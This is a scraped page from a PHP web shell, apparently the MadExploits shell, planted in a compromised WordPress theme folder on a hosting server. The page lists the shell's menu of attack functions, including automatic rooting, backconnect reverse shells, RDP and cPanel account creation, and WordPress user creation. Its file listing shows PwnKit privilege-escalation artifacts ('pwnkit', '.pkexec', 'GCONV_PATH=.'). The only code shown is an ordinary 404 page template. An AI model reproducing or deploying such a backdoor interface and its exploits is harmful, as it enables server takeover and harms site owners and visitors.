Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.49
KB
-rw-r--r--
archive-portfolio.php
1.23
KB
-rw-r--r--
archive.php
2.25
KB
-rw-r--r--
comments.php
4.94
KB
-rw-r--r--
footer.php
924
B
-rw-r--r--
functions.php
12.39
KB
-rw-r--r--
functions.php.backup-202511030...
10.67
KB
-rw-r--r--
header.php
1.99
KB
-rw-r--r--
index.php
2.51
KB
-rw-r--r--
page.php
855
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
187.77
KB
-rw-r--r--
search.php
2.25
KB
-rw-r--r--
searchform.php
653
B
-rw-r--r--
sidebar.php
371
B
-rw-r--r--
single-portfolio.php
335
B
-rw-r--r--
single.php
365
B
-rw-r--r--
style-editor.css
41.47
KB
-rw-r--r--
style-rtl.css
11.49
KB
-rw-r--r--
style.css
1.54
KB
-rw-r--r--
wp-debug.log
102
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found) * * @link https://codex.wordpress.org/Creating_an_Error_404_Page * * @package imroz */ get_header(); $imroz_options = Helper::imroz_get_options(); ?> <!-- Start 404 Page --> <div class="error-page-inner bg_color--4"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="inner"> <?php if(!empty($imroz_options['imroz_404_title'])){ ?> <h1 class="title theme-gradient"><?php echo esc_html( $imroz_options['imroz_404_title'] );?></h1> <?php } ?> <?php if(!empty($imroz_options['imroz_404_subtitle'])){ ?> <h3 class="sub-title"><?php echo esc_html( $imroz_options['imroz_404_subtitle'] );?></h3> <?php } ?> <?php if(!empty($imroz_options['imroz_404_desc'])){ ?> <span><?php echo esc_html( $imroz_options['imroz_404_desc'] );?></span> <?php } ?> <?php if( $imroz_options['imroz_enable_go_back_btn'] == 'yes'){ ?> <div class="error-button"> <a class="rn-button-style--2 btn_solid" href="<?php echo esc_url( home_url( '/' ) );?>"><?php echo esc_html( $imroz_options['imroz_404_button_text'] );?></a> </div> <?php } ?> </div> </div> </div> </div> </div> <!-- End 404 Page --> <?php get_footer();
Close